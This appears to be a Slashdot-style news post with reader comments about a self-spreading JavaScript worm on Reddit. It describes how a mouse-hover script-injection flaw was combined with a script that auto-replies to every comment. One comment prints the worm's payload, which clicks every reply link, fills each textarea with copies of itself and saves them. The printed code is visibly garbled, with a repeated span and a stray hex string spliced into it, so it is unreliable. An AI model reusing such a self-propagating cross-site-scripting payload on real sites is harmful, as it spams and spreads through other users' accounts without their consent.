Reddit Javascript Exploit Spreading Virally

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

Re:proof of concept

[immortalpob]

This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

Re:Well, that site has a terrible design

[aoni782]

The script:

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"